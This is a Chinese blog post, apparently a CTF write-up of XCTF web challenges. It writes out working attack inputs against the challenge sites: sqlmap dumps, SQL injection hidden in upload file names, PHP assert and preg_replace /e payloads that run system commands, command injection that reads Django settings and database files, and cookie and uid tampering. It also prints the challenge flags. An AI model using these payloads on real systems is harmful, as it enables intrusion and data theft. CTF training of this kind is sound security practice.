<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">



  <meta name="google-site-verification" content="1gKDAfjMjYT38fOTFSyhEOLm7-FQlmNHxLM5SNpSFAc">














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,">





  <link rel="alternate" href="/rss2.xml" title="Jaie" type="application/atom+xml">






<meta name="description" content="攻防世界web高手区1.ics-06url中id=1，进行爆破，到2333，出现flag Flag:cyberpeace{4468f3e51629f05830259d073f03dbd6} 2. NewsCenter ——sql注入sql注入post型，sqlmap自动化注入，sqlmap.py -r “post.txt” –dbs -D news -T secret_table –dump fl">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界web 高手区部分Writeup">
<meta property="og:url" content="https://www.jaie.cc/2020/04/05/攻防世界web 部分wp/index.html">
<meta property="og:site_name" content="Jaie">
<meta property="og:description" content="攻防世界web高手区1.ics-06url中id=1，进行爆破，到2333，出现flag Flag:cyberpeace{4468f3e51629f05830259d073f03dbd6} 2. NewsCenter ——sql注入sql注入post型，sqlmap自动化注入，sqlmap.py -r “post.txt” –dbs -D news -T secret_table –dump fl">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image002.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image004.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image006.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image008.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image010.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image012.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image014.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image016.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image018.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image020.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image022.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image024.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image026.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image028.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image030.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image032.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image034.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image036.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image038.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image040.gif">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image042.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image044.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image046.gif">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image048.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image050.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image052.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image054.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image056.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image058.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image060.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image062.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image064.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image066.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image068.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image070.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image072.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image074.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image076.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image078.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image080.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image082.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image084.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image086.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image088.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image090.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image092.jpg">
<meta property="og:image" content="file:///C:/Users/jaie/AppData/Local/Temp/msohtmlclip1/01/clip_image094.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image096.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image098.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image100.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image102.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image104.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image106.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image108.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image110.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image112.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image114.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image116.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image118.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image120.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image122.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image124.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image126.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image128.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image130.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image132.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image134.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image136.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image138.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image140.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image142.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image144.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image146.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image148.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image150.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image152.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image154.jpg">
<meta property="og:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image156.jpg">
<meta property="og:updated_time" content="2020-04-04T17:19:23.097Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="攻防世界web 高手区部分Writeup">
<meta name="twitter:description" content="攻防世界web高手区1.ics-06url中id=1，进行爆破，到2333，出现flag Flag:cyberpeace{4468f3e51629f05830259d073f03dbd6} 2. NewsCenter ——sql注入sql注入post型，sqlmap自动化注入，sqlmap.py -r “post.txt” –dbs -D news -T secret_table –dump fl">
<meta name="twitter:image" content="https://www.jaie.cc/2020/04/05/攻防世界web%20部分wp/clip_image002.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://www.jaie.cc/2020/04/05/攻防世界web 部分wp/">





  <title>攻防世界web 高手区部分Writeup | Jaie</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Jaie</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-留言板">
          <a href="/guestbook" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-newspaper-o"></i> <br>
            
            留言板
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.jaie.cc/2020/04/05/攻防世界web 部分wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Jaie">
      <meta itemprop="description" content>
      <meta itemprop="image" content="https://jaie-1256725437.cos.ap-guangzhou.myqcloud.com/pic/20190424201847.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Jaie">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">攻防世界web 高手区部分Writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-04-05T01:15:25+08:00">
                2020-04-05
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index">
                    <span itemprop="name">ctf</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  3k
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="攻防世界web高手区"><a href="#攻防世界web高手区" class="headerlink" title="攻防世界web高手区"></a>攻防世界web高手区</h1><h2 id="1-ics-06"><a href="#1-ics-06" class="headerlink" title="1.ics-06"></a>1.ics-06</h2><p>url中id=1，进行爆破，到2333，出现flag</p>
<p>Flag:cyberpeace{4468f3e51629f05830259d073f03dbd6}</p>
<h2 id="2-NewsCenter-——sql注入"><a href="#2-NewsCenter-——sql注入" class="headerlink" title="2. NewsCenter ——sql注入"></a>2. NewsCenter ——sql注入</h2><p>sql注入post型，sqlmap自动化注入，sqlmap.py -r “post.txt” –dbs -D news -T secret_table –dump</p>
<p>flag:QCTF{sq1_inJec7ion_ezzz}</p>
<h2 id="3-Mfw-——-git路径信息泄漏"><a href="#3-Mfw-——-git路径信息泄漏" class="headerlink" title="3. Mfw ——.git路径信息泄漏"></a>3. Mfw ——.git路径信息泄漏</h2><p>进行目录扫描，发现。.git目录泄漏</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image002.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image004.jpg" alt="img"></p>
<p>GitHack是一个.git泄露利用测试脚本，通过泄露的文件，还原重建工程源代码。</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image006.jpg" alt="img"></p>
<p>flag.php源文件看不所以来，去index.php看一下进行代码审计</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image008.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image010.jpg" alt="img"></p>
<p>$file = “templates/“ . $page . “.php”;page这个变量是直接从GET参数中获取的，没有进行任何处理，那么也就意味着我们输入的任何东西就能够在不被验证的情况下执行。那么，我们可以在这个位置放置system函数。这样，由于后面的assert函数，system函数就成功得以运行并输出结果。</p>
<p>构建$file变量：$file = “templates/“ . ‘.system(“ pwd ;”).’ . “.php”;</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image012.jpg" alt="img"></p>
<p>flag.php不存在，使用git diff比较工作区与暂存区的差异</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image014.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image016.jpg" alt="img"></p>
<h2 id="4-NaNNaNNaNNaN-Batman"><a href="#4-NaNNaNNaNNaN-Batman" class="headerlink" title="4. NaNNaNNaNNaN-Batman"></a>4. NaNNaNNaNNaN-Batman</h2><p>下载下来的压缩包解压，得到一个web100的文本，查看是乱码，但还是可以看出是js代码，把文件类型改为html，在浏览器打开</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image018.jpg" alt="img"></p>
<p>把eval（）函数改成alert()函数，弹窗可以得到源代码了</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image020.jpg" alt="img"></p>
<p>js function $() { var e = document.getElementById(‘c’).value; if (e.length == 16) { if (e.match(/^be0f23/) != null) { if (e.match(/233ac/) != null) { if (e.match(/e98aa$/) != null) { if (e.match(/c7be9/) != null) { var t = [‘fl’, ‘s_a’, ‘i’, ‘e}’]; var n = [‘a’, ‘_h0l’, ‘n’]; var r = [‘g{‘, ‘e’, ‘<em>0’]; var i = [‘it\’’, ‘</em>‘, ‘n’]; var s = [t, n, r, i]; for (var o = 0; o &lt; 13; ++o) { document.write(s[o % 4][0]); s[o % 4].splice(0, 1); } } } } } } } document.write(‘<input id="c"><button onclick="$()">Ok</button>‘); delete _;</p>
<p>根据分析是正则表达式</p>
<p>be0f233ac7be98aa。</p>
<p>把它输入文本框，得到flag值，</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image022.jpg" alt="img"></p>
<h2 id="5-Upload-—————文件名注入"><a href="#5-Upload-—————文件名注入" class="headerlink" title="5. Upload   —————文件名注入"></a>5. Upload   —————文件名注入</h2><p>用常规的文件上传方式失败无果，且无法得到上传文件放置的目录</p>
<p>文件名称注入,使用select,from,发现被过滤，内嵌select绕过过滤，使用CONV,substr,hex</p>
<p>函数，CONV函数将16进制转化为10进制，依次获取子串的12位，用substr截取12是因为一旦过长，会用科学计数法表示。</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image024.jpg" alt="img"></p>
<p>返回回显数字131277325825392转化为字符串为web_up即为部分库名，</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image026.jpg" alt="img"></p>
<p>文件名’+(selselectect CONV(substr(hex(dAtaBase()),13,12),16,10))+’.jpg让其显示库名的后部分</p>
<p>1819238756转化二进制转化字符串即为load，合并前一部分数据库名为web_upload</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image028.jpg" alt="img"></p>
<p>文件名 ‘+(seleselectct+CONV(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema=’web_upload’ limit 1,1)),1,12),16,10))+’.jpg</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image030.jpg" alt="img"></p>
<p>转换为字符串为：hello_</p>
<p>文件名’+(seleselectct+CONV(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema=’web_upload’ limit 1,1)),13,12),16,10))+’.jpg</p>
<p>得到回显为：112615676665705转化字符串flag_i</p>
<p>继续探测表名，</p>
<p>文件名’+(seleselectct+CONV(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema=’web_upload’ limit 1,1)),25,12),16,10))+’.jpg</p>
<p>得到回显：126853610566245转化字符串：s_here</p>
<p>最终得到表名为：hello_flag_is_here</p>
<p>得到表名继续探测列名构建sql注入语句</p>
<p>文件名’+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = ‘hello_flag_is_here’ limit 0,1)),1,12),16,10))+’.jpg</p>
<p>得到回显为：115858377367398转化为字符串i_am_f</p>
<p>文件名’+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = ‘hello_flag_is_here’ limit 0,1)),13,12),16,10))+’.jpg</p>
<p>得到回显为7102823转化字符串lag。</p>
<p>所以列名为i_am_flag</p>
<p>导出列名得值构建sql语句</p>
<p>文件名’+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),1,12),16,10))+’.jpg</p>
<p>得到回显为：36427215695199</p>
<p>转化字符串为!!_@m_</p>
<p>继续构造sql函数</p>
<p>文件名’+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),13,12),16,10))+’.jpg</p>
<p>得到回显为：92806431727430</p>
<p>转化字符串为Th.e_F</p>
<p>文件名’+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),25,12),16,10))+’.jpg</p>
<p>得到回显560750951</p>
<p>转化为!lag</p>
<p>拼接完成为!!_@m_ Th.e_F!lag即为flag值</p>
<h2 id="6-PHP2"><a href="#6-PHP2" class="headerlink" title="6. PHP2"></a>6. PHP2</h2><p>进行目录扫描，发现index.php的备份文件index.php2,</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image032.jpg" alt="img">访问index.php2文件查看源代码，根据代码要使登录成功必须满足两个条件，第一步，要使得”admin”===$_GET[id]不成立</p>
<p>第二步，经过$_GET[id] = urldecode($_GET[id]);，使得$_GET[id] == “admin”成立。</p>
<pre><code>?id=%2561dmin
</code></pre><p>urldecode/urlencode</p>
<p>当传入参数id时，浏览器在后面会对非ASCII码的字符进行一次urlencode</p>
<p>然后在这段代码中运行时，会自动进行一次urldecode</p>
<p>在urldecode()函数中，再一次进行一次解码</p>
<p>urldecode(%2561)=%61</p>
<p>urldecode(%61)=a</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image034.jpg" alt="img"></p>
<h2 id="7-unserialize3-——php反序列化"><a href="#7-unserialize3-——php反序列化" class="headerlink" title="7. unserialize3 ——php反序列化"></a>7. unserialize3 ——php反序列化</h2><p>打开网页后是一段php代码，对其进行审计，进行序列化</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image036.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image038.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image040.gif" alt="5ed305f75daf17bd8727a0af171f584"></p>
<p>然后通过_wakeup()执行漏洞（一个字符串或对象被序列化后，如果其属性被修改，则不会执行<strong>wakeup()函数）来绕过这个wakeup函数。我们把序列码修改其属性1为2后，输入url中，当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过</strong>wakeup的执行</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image042.jpg" alt="img"></p>
<h2 id="8-Cat-——命令注入"><a href="#8-Cat-——命令注入" class="headerlink" title="8. Cat  ——命令注入"></a>8. Cat  ——命令注入</h2><p>看到题目尝试ping下可通，用命令连接符连接命令，ls，echo，cat等命令发现无果</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image044.jpg" alt="img"></p>
<p>url中可接受url编码，%80特殊ascii码符号，url编码使用的是16进制，80也就是128，ASCII码是从0-127，使其产生报错，根据报错信息可得知是基于python环境<a href="https://www.django.cn/" target="_blank" rel="noopener">django</a> web框架，根据框架得信息和框架结构，使用php curl，@</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image046.gif" alt="å¨è¿éæå¥å¾çæè¿°"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image048.jpg" alt="img"></p>
<p><a href="mailto:访问配置文件@/opt/api/api/settings.py" target="_blank" rel="noopener">访问配置文件@/opt/api/api/settings.py</a>，搜索关键词database，等到数据库的信息</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image050.jpg" alt="img"></p>
<p><a href="mailto:访问@/opt/api/database.sqlite3" target="_blank" rel="noopener">访问@/opt/api/database.sqlite3</a>，搜索关键字ctf，得到flag值</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image052.jpg" alt="img"></p>
<h2 id="9-ics-04——sql-post注入"><a href="#9-ics-04——sql-post注入" class="headerlink" title="9. ics-04——sql post注入"></a>9. ics-04——sql post注入</h2><p><img src="/2020/04/05/攻防世界web 部分wp/clip_image054.jpg" alt="img"></p>
<p>首先先尝试一下登录，注册一个名为admin的账号，登录后，告诉我是普通用户，无效</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image056.jpg" alt="img"></p>
<p>点击一下忘记密码，看看有没有其他出路</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image058.jpg" alt="img"></p>
<p>修改的还是admin普通账户，现在我开启burp进行拦包，看有没有越权操作，好像有没有什么可以操作的，到时揽到一个post的包，sqlmap跑一下再说</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image060.jpg" alt="img"></p>
<p>跑出来了，密码进行md5解密，为1qazWSXED56yhn8ujm9olk81wdfTG，去登陆，成功，取得flag</p>
<p> <img src="/2020/04/05/攻防世界web 部分wp/clip_image062.jpg" alt="img"></p>
<h2 id="10-Isc-05"><a href="#10-Isc-05" class="headerlink" title="10.Isc-05"></a>10.Isc-05</h2><p><img src="/2020/04/05/攻防世界web 部分wp/clip_image064.jpg" alt="img"></p>
<p>进入指定页面发现平白无奇，查看源代码，发现传参page，在url尝试一波，试了一下不是命令执行，而是php伪协议的文件包含</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image066.jpg" alt="img"></p>
<p>Php伪协议base64读取index.php源代码。</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image068.jpg" alt="img"></p>
<p>把转化明文，从源代码中可以看出要求X_FORWARDED_FOR为127.0.0.1，并且有3个get方式可传参数，pat、rep、sub</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image070.jpg" alt="img"></p>
<p>构造url：/index.php?pat=/(.*)/e&amp;rep=system(‘ls’)&amp;sub=aa  如图</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image072.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image074.jpg" alt="img"></p>
<p>?pat=/(.*)/e&amp;rep=system(‘ls+s3chahahaDir’)&amp;sub=aa  查看s3chahahaDir文件夹</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image076.jpg" alt="img"></p>
<p>?pat=/(.*)/e&amp;rep=system(‘ls+s3chahahaDir/flag’)&amp;sub=aa 查看flag文件夹，发现flag.php文件</p>
<p>/index.php?pat=/(.*)/e&amp;rep=system(‘cat+s3chahahaDir/flag/flag.php’)&amp;sub=aa  查看flag，</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image078.jpg" alt="img"></p>
<p>在查看页面源代码中可以看到flag值</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image080.jpg" alt="img"></p>
<h2 id="11-BUG"><a href="#11-BUG" class="headerlink" title="11.BUG"></a>11.BUG</h2><p>开局就注册和登陆的界面</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image082.jpg" alt="img"></p>
<p>先任意注册一个用户，登陆后发现cookie user值是md5加密的，发现cookie值得组成方式是”uid:用户名”的形式组成的，可得到admin用户的cookie未加密时为”1:admin” 修改user为admin加密的md5值，刷新发现home模块还是显示abc用户，并且menge模块不可看</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image084.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image086.jpg" alt="img"></p>
<p>点击persional，修改url的uid为1，就可以admin的个人信息</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image088.jpg" alt="img"></p>
